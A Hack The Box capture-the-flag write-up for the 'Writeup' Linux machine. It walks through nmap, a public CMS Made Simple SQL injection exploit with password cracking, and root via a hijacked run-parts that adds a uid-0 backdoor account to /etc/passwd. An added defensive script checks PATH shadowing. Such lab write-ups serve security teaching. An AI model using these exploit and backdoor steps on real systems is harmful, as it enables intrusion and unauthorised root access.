Hack The Box - Writeup

Quick Summary

Hey guys, today Writeup retired and here’s my write-up about it. It was a very nice box and I enjoyed it. It’s a Linux box and its IP is 10.10.10.138; I added it to /etc/hosts as writeup.htb. Let’s jump right in!

Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/writeup# nmap -sV -sT -sC -o nmapinitial writeup.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-11 16:03 EET
Nmap scan report for writeup.htb (10.10.10.138)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds

We got HTTP on port 80 and SSH on port 22. On port 80 nmap found /robots.txt with a disallowed entry for /writeup/.

Web Enumeration

http://writeup.htb

The index page says that the website is not ready yet. It also says that there’s a DoS protection script, so we won’t bruteforce anything.
Let’s check /writeup:

/writeup is the write-ups page and, as the index page said, it’s still not ready yet, which is why it was disallowed in robots.txt.
I checked Wappalyzer’s results and saw that it’s using a CMS called CMS Made Simple:

Without Wappalyzer we can still identify that by looking at the source of the page:

<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />

SQLi, User Flag

I searched for exploits for CMS Made Simple, and because the version was from 2019 (Copyright (C) 2004-2019) I searched only for exploits from 2019.
I found this SQL injection exploit, so I gave it a try.
I set the time to 3:

TIME = 3

Then I ran the exploit:

root@kali:~/Desktop/HTB/boxes/writeup# python 46635.py -u http://writeup.htb/writeup/ --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9

Now we can SSH into the box as jkr : raykayjay9:

We owned user.

Hijacking run-parts, Root Flag

I downloaded pspy32 to the box and ran it to monitor the processes. I noticed the following:

2019/10/11 10:35:58 CMD: UID=0    PID=2279   | sshd: [accepted]
2019/10/11 10:35:58 CMD: UID=102 PID=2280 | sshd: [net]
2019/10/11 10:36:00 CMD: UID=0 PID=2281 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2019/10/11 10:36:00 CMD: UID=0 PID=2282 | run-parts --lsbsysinit /etc/update-motd.d
2019/10/11 10:36:00 CMD: UID=0 PID=2283 | /bin/sh /etc/update-motd.d/10-uname
2019/10/11 10:36:00 CMD: UID=0 PID=2284 | /bin/sh /etc/update-motd.d/10-uname
2019/10/11 10:36:00 CMD: UID=0 PID=2285 | sshd: jkr [priv]

On every successful SSH login:

sshd: [accepted]
sshd: [net]

these commands get executed as root:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new          
run-parts --lsbsysinit /etc/update-motd.d
/bin/sh /etc/update-motd.d/10-uname
/bin/sh /etc/update-motd.d/10-uname

When I checked jkr’s groups I saw that jkr was in a group called staff:

jkr@writeup:/tmp$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

And staff members could write to /usr/local/bin:

jkr@writeup:/tmp$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin

By default run-parts was in /bin:

jkr@writeup:/tmp$ which run-parts
/bin/run-parts

But if we take a look at the env command that sets the PATH on every SSH login, we’ll see that /usr/local/bin comes before /bin (where the real run-parts lives):

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

Which means that we can put an executable of our choice in /usr/local/bin and call it run-parts; the next time someone logs in over SSH, our fake run-parts will be executed as root instead of /bin/run-parts.
I wrote a bash script that echoes:

rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash

to /etc/passwd, which adds a new user rooot with password AAAA and uid 0 (the same line from the previous post):

jkr@writeup:/usr/local/bin$ nano run-parts
jkr@writeup:/usr/local/bin$ chmod +x run-parts
jkr@writeup:/usr/local/bin$ cat run-parts
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
jkr@writeup:/usr/local/bin$ which run-parts
/usr/local/bin/run-parts
jkr@writeup:/usr/local/bin$
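A defender’s check for this exact condition, added here as an example and not part of the original write-up: given a PATH string and a command name, it lists every directory that is searched before the one actually holding the command and that the current user can write to. Run as an unprivileged user against the PATH the MOTD job exports, it flags /usr/local/bin for run-parts whenever that directory is group-writable by staff. The function name and the top-level demo are my own; the PATH value is the one from the pspy output above.

```shell
#!/bin/sh
# Added example (not from the original write-up): find directories that
# could shadow a command for a given PATH search order.
# Usage: shadowing_dirs "<path string>" <command>
# Prints one writable, earlier-in-search-order directory per line.
# Returns 0 if the command resolves somewhere in the PATH, 1 otherwise.
shadowing_dirs() {
    path_string="$1"; cmd="$2"; found=""
    old_ifs=$IFS; IFS=':'
    # First pass: where does the command actually resolve?
    for dir in $path_string; do
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            found="$dir"; break
        fi
    done
    if [ -z "$found" ]; then IFS=$old_ifs; return 1; fi
    # Second pass: every directory ahead of the real one that we can write to.
    # A root-owned job using this PATH would pick up a same-named file there.
    for dir in $path_string; do
        [ "$dir" = "$found" ] && break
        if [ -d "$dir" ] && [ -w "$dir" ]; then printf '%s\n' "$dir"; fi
    done
    IFS=$old_ifs
    return 0
}

# The PATH the MOTD job sets (from the pspy output) before calling run-parts.
MOTD_PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'

# Demo: run as the interactive user (jkr on the box) to see which
# directories could shadow the real run-parts for that PATH.
if hits=$(shadowing_dirs "$MOTD_PATH" run-parts); then
    if [ -n "$hits" ]; then
        echo "run-parts can be shadowed from:"; echo "$hits"
    else
        echo "no writable directory precedes run-parts in this PATH"
    fi
else
    echo "run-parts not found in this PATH"
fi
```

The fix on the host side is the mirror image of the check: every directory on a PATH used by a root-run job must be owned by root and not group- or world-writable.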

Then I started a new SSH session and the script was successfully executed:

root@kali:~/Desktop/HTB/boxes/writeup# ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 11 10:48:16 2019 from 10.10.xx.xx
jkr@writeup:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
messagebus:x:101:104::/var/run/dbus:/bin/false
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
jkr:x:1000:1000:jkr,,,:/home/jkr:/bin/bash
mysql:x:103:106:MySQL Server,,,:/nonexistent:/bin/false
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
jkr@writeup:~$ su rooot
Password:
root@writeup:/home/jkr# whoami
root

And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, and follow on Twitter @Ahm3d_H3sham.
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Ghoul
Next Hack The Box write-up : Hack The Box - Ellingson